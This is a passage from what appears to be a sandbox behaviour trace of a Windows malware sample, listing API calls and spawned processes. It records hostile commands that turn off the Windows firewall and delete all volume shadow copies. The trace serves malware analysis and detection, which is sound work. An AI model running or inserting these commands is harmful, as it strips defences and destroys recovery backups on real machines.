(_FileHandle=0) returned 0x2a4 [0045.453] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.453] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0045.453] GetFileType (hFile=0x2b0) returned 0x3 [0045.453] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0045.453] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="netsh advfirewall set currentprofile state off\n", cchWideChar=-1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netsh advfirewall set currentprofile state off\n", lpUsedDefaultChar=0x0) returned 48 [0045.453] WriteFile (in: hFile=0x2b0, lpBuffer=0x7ff6d1ac9970*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0xdd04cffae8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesWritten=0xdd04cffae8*=0x2f, lpOverlapped=0x0) returned 1 [0045.453] GetProcessHeap () returned 0x231f2440000 [0045.453] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0x4012) returned 0x231f2448fe0 [0045.453] GetProcessHeap () returned 0x231f2440000 [0045.453] RtlFreeHeap (HeapHandle=0x231f2440000, Flags=0x0, BaseAddress=0x231f2448fe0) returned 1 [0045.454] _wcsicmp (_String1="netsh", _String2=")") returned 69 [0045.454] _wcsicmp (_String1="FOR", _String2="netsh") returned -8 [0045.454] _wcsicmp (_String1="FOR/?", _String2="netsh") returned -8 [0045.454] _wcsicmp (_String1="IF", _String2="netsh") returned -5 [0045.454] _wcsicmp (_String1="IF/?", _String2="netsh") returned -5 [0045.454] _wcsicmp (_String1="REM", _String2="netsh") returned 4 [0045.454] _wcsicmp (_String1="REM/?", _String2="netsh") returned 4 [0045.454] GetProcessHeap () returned 0x231f2440000 [0045.454] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0xb0) returned 0x231f2448320 [0045.454] GetProcessHeap () returned 0x231f2440000 [0045.454] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0x1c) returned 0x231f2446a80 [0045.455] GetProcessHeap () returned 0x231f2440000 [0045.455] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0x64) returned 0x231f2441850 [0045.455] GetConsoleOutputCP () returned 0x1b5 [0045.997] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6d1acfbb0 | out: lpCPInfo=0x7ff6d1acfbb0) returned 1 [0045.997] SetThreadUILanguage (LangId=0x0) returned 0x409 [0046.419] GetConsoleTitleW (in: lpConsoleTitle=0xdd04cff930, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0046.981] malloc (_Size=0xffce) returned 0x231f2640840 [0046.982] ??_V@YAXPEAX@Z () returned 0x231f2640840 [0046.982] malloc (_Size=0xffce) returned 0x231f2650820 [0046.982] ??_V@YAXPEAX@Z () returned 0x231f2650820 [0046.983] _wcsicmp (_String1="netsh", _String2="DIR") returned 10 [0046.983] _wcsicmp (_String1="netsh", _String2="ERASE") returned 9 [0046.983] _wcsicmp (_String1="netsh", _String2="DEL") returned 10 [0046.983] _wcsicmp (_String1="netsh", _String2="TYPE") returned -6 [0046.983] _wcsicmp (_String1="netsh", _String2="COPY") returned 11 [0046.983] _wcsicmp (_String1="netsh", _String2="CD") returned 11 [0046.983] _wcsicmp (_String1="netsh", _String2="CHDIR") returned 11 [0046.983] _wcsicmp (_String1="netsh", _String2="RENAME") returned -4 [0046.983] _wcsicmp (_String1="netsh", _String2="REN") returned -4 [0046.983] _wcsicmp (_String1="netsh", _String2="ECHO") returned 9 [0046.983] _wcsicmp (_String1="netsh", _String2="SET") returned -5 [0046.983] _wcsicmp (_String1="netsh", _String2="PAUSE") returned -2 [0046.983] _wcsicmp (_String1="netsh", _String2="DATE") returned 10 [0046.983] _wcsicmp (_String1="netsh", _String2="TIME") returned -6 [0046.983] _wcsicmp (_String1="netsh", _String2="PROMPT") returned -2 [0046.983] _wcsicmp (_String1="netsh", _String2="MD") returned 1 [0046.983] _wcsicmp (_String1="netsh", _String2="MKDIR") returned 1 [0046.983] _wcsicmp (_String1="netsh", _String2="RD") returned -4 [0046.983] _wcsicmp (_String1="netsh", _String2="RMDIR") returned -4 [0046.983] _wcsicmp (_String1="netsh", _String2="PATH") returned -2 [0046.983] _wcsicmp (_String1="netsh", _String2="GOTO") returned 7 [0046.983] _wcsicmp (_String1="netsh", _String2="SHIFT") returned -5 [0046.983] _wcsicmp (_String1="netsh", _String2="CLS") returned 11 [0046.983] _wcsicmp (_String1="netsh", _String2="CALL") returned 11 [0046.983] _wcsicmp (_String1="netsh", _String2="VERIFY") returned -8 [0046.983] _wcsicmp (_String1="netsh", _String2="VER") returned -8 [0046.983] _wcsicmp (_String1="netsh", _String2="VOL") returned -8 [0046.983] _wcsicmp (_String1="netsh", _String2="EXIT") returned 9 [0046.983] _wcsicmp (_String1="netsh", _String2="SETLOCAL") returned -5 [0046.984] _wcsicmp (_String1="netsh", _String2="ENDLOCAL") returned 9 [0046.984] _wcsicmp (_String1="netsh", _String2="TITLE") returned -6 [0046.984] _wcsicmp (_String1="netsh", _String2="START") returned -5 [0046.984] _wcsicmp (_String1="netsh", _String2="DPATH") returned 10 [0046.984] _wcsicmp (_String1="netsh", _String2="KEYS") returned 3 [0046.984] _wcsicmp (_String1="netsh", _String2="MOVE") returned 1 [0046.984] _wcsicmp (_String1="netsh", _String2="PUSHD") returned -2 [0046.984] _wcsicmp (_String1="netsh", _String2="POPD") returned -2 [0046.984] _wcsicmp (_String1="netsh", _String2="ASSOC") returned 13 [0046.984] _wcsicmp (_String1="netsh", _String2="FTYPE") returned 8 [0046.984] _wcsicmp (_String1="netsh", _String2="BREAK") returned 12 [0046.984] _wcsicmp (_String1="netsh", _String2="COLOR") returned 11 [0046.984] _wcsicmp (_String1="netsh", _String2="MKLINK") returned 1 [0046.984] _wcsicmp (_String1="netsh", _String2="DIR") returned 10 [0046.984] _wcsicmp (_String1="netsh", _String2="ERASE") returned 9 [0046.984] _wcsicmp (_String1="netsh", _String2="DEL") returned 10 [0046.984] _wcsicmp (_String1="netsh", _String2="TYPE") returned -6 [0046.984] _wcsicmp (_String1="netsh", _String2="COPY") returned 11 [0046.984] _wcsicmp (_String1="netsh", _String2="CD") returned 11 [0046.984] _wcsicmp (_String1="netsh", _String2="CHDIR") returned 11 [0046.984] _wcsicmp (_String1="netsh", _String2="RENAME") returned -4 [0046.984] _wcsicmp (_String1="netsh", _String2="REN") returned -4 [0046.984] _wcsicmp (_String1="netsh", _String2="ECHO") returned 9 [0046.984] _wcsicmp (_String1="netsh", _String2="SET") returned -5 [0046.984] _wcsicmp (_String1="netsh", _String2="PAUSE") returned -2 [0046.984] _wcsicmp (_String1="netsh", _String2="DATE") returned 10 [0046.984] _wcsicmp (_String1="netsh", _String2="TIME") returned -6 [0046.984] _wcsicmp (_String1="netsh", _String2="PROMPT") returned -2 [0046.984] _wcsicmp (_String1="netsh", _String2="MD") returned 1 [0046.984] _wcsicmp (_String1="netsh", _String2="MKDIR") returned 1 [0046.984] _wcsicmp (_String1="netsh", _String2="RD") returned -4 [0046.984] _wcsicmp (_String1="netsh", _String2="RMDIR") returned -4 [0046.984] _wcsicmp (_String1="netsh", _String2="PATH") returned -2 [0046.984] _wcsicmp (_String1="netsh", _String2="GOTO") returned 7 [0046.984] _wcsicmp (_String1="netsh", _String2="SHIFT") returned -5 [0046.984] _wcsicmp (_String1="netsh", _String2="CLS") returned 11 [0046.984] _wcsicmp (_String1="netsh", _String2="CALL") returned 11 [0046.984] _wcsicmp (_String1="netsh", _String2="VERIFY") returned -8 [0046.984] _wcsicmp (_String1="netsh", _String2="VER") returned -8 [0046.984] _wcsicmp (_String1="netsh", _String2="VOL") returned -8 [0046.984] _wcsicmp (_String1="netsh", _String2="EXIT") returned 9 [0046.984] _wcsicmp (_String1="netsh", _String2="SETLOCAL") returned -5 [0046.984] _wcsicmp (_String1="netsh", _String2="ENDLOCAL") returned 9 [0046.984] _wcsicmp (_String1="netsh", _String2="TITLE") returned -6 [0046.985] _wcsicmp (_String1="netsh", _String2="START") returned -5 [0046.985] _wcsicmp (_String1="netsh", _String2="DPATH") returned 10 [0046.985] _wcsicmp (_String1="netsh", _String2="KEYS") returned 3 [0046.985] _wcsicmp (_String1="netsh", _String2="MOVE") returned 1 [0046.985] _wcsicmp (_String1="netsh", _String2="PUSHD") returned -2 [0046.985] _wcsicmp (_String1="netsh", _String2="POPD") returned -2 [0046.985] _wcsicmp (_String1="netsh", _String2="ASSOC") returned 13 [0046.985] _wcsicmp (_String1="netsh", _String2="FTYPE") returned 8 [0046.985] _wcsicmp (_String1="netsh", _String2="BREAK") returned 12 [0046.985] _wcsicmp (_String1="netsh", _String2="COLOR") returned 11 [0046.985] _wcsicmp (_String1="netsh", _String2="MKLINK") returned 1 [0046.985] _wcsicmp (_String1="netsh", _String2="FOR") returned 8 [0046.985] _wcsicmp (_String1="netsh", _String2="IF") returned 5 [0046.985] _wcsicmp (_String1="netsh", _String2="REM") returned -4 [0046.985] ??_V@YAXPEAX@Z () returned 0x1 [0046.985] GetProcessHeap () returned 0x231f2440000 [0046.985] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0xffde) returned 0x231f2448fe0 [0046.986] GetProcessHeap () returned 0x231f2440000 [0046.986] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0x70) returned 0x231f24483e0 [0046.986] _wcsnicmp (_String1="nets", _String2="cmd ", _MaxCount=0x4) returned 11 [0046.986] malloc (_Size=0xffce) returned 0x231f2650820 [0046.986] ??_V@YAXPEAX@Z () returned 0x231f2650820 [0046.986] GetProcessHeap () returned 0x231f2440000 [0046.986] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0x1ffac) returned 0x231f2458fd0 [0046.988] SetErrorMode (uMode=0x0) returned 0x0 [0046.988] SetErrorMode (uMode=0x1) returned 0x0 [0046.988] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x231f2458fe0, lpFilePart=0xdd04cff1b0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xdd04cff1b0*="Desktop") returned 0x17 [0046.988] SetErrorMode (uMode=0x0) returned 0x1 [0046.988] GetProcessHeap () returned 0x231f2440000 [0046.988] RtlReAllocateHeap (Heap=0x231f2440000, Flags=0x0, Ptr=0x231f2458fd0, Size=0x4c) returned 0x231f2458fd0 [0046.988] GetProcessHeap () returned 0x231f2440000 [0046.988] RtlSizeHeap (HeapHandle=0x231f2440000, Flags=0x0, MemoryPointer=0x231f2458fd0) returned 0x4c [0046.988] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6d1acbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0046.988] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0046.988] GetProcessHeap () returned 0x231f2440000 [0046.988] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0x1bc) returned 0x231f2446c30 [0046.988] GetProcessHeap () returned 0x231f2440000 [0046.988] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0x368) returned 0x231f2459030 [0046.992] GetProcessHeap () returned 0x231f2440000 [0046.992] RtlReAllocateHeap (Heap=0x231f2440000, Flags=0x0, Ptr=0x231f2459030, Size=0x1be) returned 0x231f2459030 [0046.992] GetProcessHeap () returned 0x231f2440000 [0046.992] RtlSizeHeap (HeapHandle=0x231f2440000, Flags=0x0, MemoryPointer=0x231f2459030) returned 0x1be [0046.992] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6d1acbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.992] GetProcessHeap () returned 0x231f2440000 [0046.992] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0xe8) returned 0x231f2446e00 [0046.993] GetProcessHeap () returned 0x231f2440000 [0046.993] RtlReAllocateHeap (Heap=0x231f2440000, Flags=0x0, Ptr=0x231f2446e00, Size=0x7e) returned 0x231f2446e00 [0046.993] GetProcessHeap () returned 0x231f2440000 [0046.993] RtlSizeHeap (HeapHandle=0x231f2440000, Flags=0x0, MemoryPointer=0x231f2446e00) returned 0x7e [0046.993] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.993] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0xdd04cfef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdd04cfef20) returned 0xffffffffffffffff [0046.993] GetLastError () returned 0x2 [0046.993] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.993] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0xdd04cfef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdd04cfef20) returned 0xffffffffffffffff [0046.993] GetLastError () returned 0x2 [0046.993] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.993] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0xdd04cfef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdd04cfef20) returned 0x231f2446e90 [0046.994] GetProcessHeap () returned 0x231f2440000 [0046.994] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x0, Size=0x28) returned 0x231f2446ef0 [0046.994] FindClose (in: hFindFile=0x231f2446e90 | out: hFindFile=0x231f2446e90) returned 1 [0046.994] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\netsh.COM", fInfoLevelId=0x1, lpFindFileData=0xdd04cfef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdd04cfef20) returned 0xffffffffffffffff [0046.994] GetLastError () returned 0x2 [0046.994] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\netsh.EXE", fInfoLevelId=0x1, lpFindFileData=0xdd04cfef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdd04cfef20) returned 0x231f2446e90 [0046.994] GetProcessHeap () returned 0x231f2440000 [0046.994] RtlReAllocateHeap (Heap=0x231f2440000, Flags=0x0, Ptr=0x231f2446ef0, Size=0x8) returned 0x231f2446ef0 [0046.994] FindClose (in: hFindFile=0x231f2446e90 | out: hFindFile=0x231f2446e90) returned 1 [0046.994] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0046.994] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0046.994] ??_V@YAXPEAX@Z () returned 0x1 [0046.994] GetConsoleTitleW (in: lpConsoleTitle=0xdd04cff4a0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0047.399] GetProcessHeap () returned 0x231f2440000 [0047.446] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0x21c) returned 0x231f2459200 [0047.446] GetConsoleTitleW (in: lpConsoleTitle=0x231f2459210, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0047.960] GetProcessHeap () returned 0x231f2440000 [0047.960] RtlReAllocateHeap (Heap=0x231f2440000, Flags=0x0, Ptr=0x231f2459200, Size=0xd8) returned 0x231f2459200 [0047.961] GetProcessHeap () returned 0x231f2440000 [0047.961] RtlSizeHeap (HeapHandle=0x231f2440000, Flags=0x0, MemoryPointer=0x231f2459200) returned 0xd8 [0047.961] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe - netsh advfirewall set currentprofile state off") returned 1 [0048.604] GetProcessHeap () returned 0x231f2440000 [0048.604] RtlFreeHeap (HeapHandle=0x231f2440000, Flags=0x0, BaseAddress=0x231f2459200) returned 1 [0048.604] InitializeProcThreadAttributeList (in: lpAttributeList=0xdd04cff3c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xdd04cff2b0 | out: lpAttributeList=0xdd04cff3c0, lpSize=0xdd04cff2b0) returned 1 [0048.604] UpdateProcThreadAttribute (in: lpAttributeList=0xdd04cff3c0, dwFlags=0x0, Attribute=0x60001, lpValue=0xdd04cff29c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xdd04cff3c0, lpPreviousValue=0x0) returned 1 [0048.604] GetStartupInfoW (in: lpStartupInfo=0xdd04cff350 | out: lpStartupInfo=0xdd04cff350*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2a4, hStdOutput=0x2b0, hStdError=0x2b0)) [0048.605] GetProcessHeap () returned 0x231f2440000 [0048.605] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0x20) returned 0x231f2446e90 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.605] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.606] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.606] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.606] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.606] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.606] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0048.606] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0048.606] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0048.606] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0048.606] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0048.606] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0048.606] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0048.606] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0048.606] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0048.606] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0048.606] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0048.606] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0048.606] GetProcessHeap () returned 0x231f2440000 [0048.606] RtlFreeHeap (HeapHandle=0x231f2440000, Flags=0x0, BaseAddress=0x231f2446e90) returned 1 [0048.606] GetProcessHeap () returned 0x231f2440000 [0048.606] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0x12) returned 0x231f2446f10 [0048.606] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0048.606] SetConsoleMode (hConsoleHandle=0x2b0, dwMode=0x0) returned 0 [0048.606] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0048.606] SetConsoleMode (hConsoleHandle=0x2a4, dwMode=0x0) returned 0 [0048.606] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\netsh.exe", lpCommandLine="netsh advfirewall set currentprofile state off", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xdd04cff2e0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="netsh advfirewall set currentprofile state off", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xdd04cff2b8 | out: lpCommandLine="netsh advfirewall set currentprofile state off", lpProcessInformation=0xdd04cff2b8*(hProcess=0x98, hThread=0x94, dwProcessId=0xf70, dwThreadId=0x39c)) returned 1 [0049.340] CloseHandle (hObject=0x94) returned 1 [0049.340] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0049.340] GetProcessHeap () returned 0x231f2440000 [0049.340] RtlFreeHeap (HeapHandle=0x231f2440000, Flags=0x0, BaseAddress=0x231f2448500) returned 1 [0049.340] GetEnvironmentStringsW () returned 0x231f2448500* [0049.340] GetProcessHeap () returned 0x231f2440000 [0049.340] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0xacc) returned 0x231f2459520 [0049.340] FreeEnvironmentStringsA (penv="=") returned 1 [0049.340] LoadLibraryExW (lpLibFileName="NTDLL.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff931f40000 [0049.340] GetProcAddress (hModule=0x7ff931f40000, lpProcName="NtQueryInformationProcess") returned 0x7ff931fe56b0 [0049.341] NtQueryInformationProcess (in: ProcessHandle=0x98, ProcessInformationClass=0x0, ProcessInformation=0xdd04cfe7b8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xdd04cfe7b8, ReturnLength=0x0) returned 0x0 [0049.341] ReadProcessMemory (in: hProcess=0x98, lpBaseAddress=0x69b63cb000, lpBuffer=0xdd04cfe7f0, nSize=0x7a0, lpNumberOfBytesRead=0xdd04cfe7b0 | out: lpBuffer=0xdd04cfe7f0*, lpNumberOfBytesRead=0xdd04cfe7b0*=0x7a0) returned 1 [0049.341] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) Thread: id = 24 os_tid = 0x15c Process: id = "5" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x4688000" os_pid = "0xf4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x4a8" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 14 os_tid = 0xf44 Thread: id = 17 os_tid = 0x47c Thread: id = 19 os_tid = 0x770 Thread: id = 20 os_tid = 0xa90 Thread: id = 22 os_tid = 0x468 Process: id = "6" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x10cc7000" os_pid = "0xdc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x3d8" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 15 os_tid = 0xb64 Thread: id = 16 os_tid = 0x1a4 Thread: id = 18 os_tid = 0xf80 Thread: id = 21 os_tid = 0xd3c Thread: id = 23 os_tid = 0x7ec Process: id = "7" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x9b4c000" os_pid = "0xf68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x4a8" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 35 os_tid = 0xf98 Thread: id = 37 os_tid = 0xb64 Process: id = "8" image_name = "netsh.exe" filename = "c:\\windows\\system32\\netsh.exe" page_root = "0x9c01000" os_pid = "0xf70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x3d8" cmd_line = "netsh advfirewall set currentprofile state off" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 36 os_tid = 0x39c [0051.075] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff6c2510000 [0051.075] __set_app_type (_Type=0x1) [0051.075] 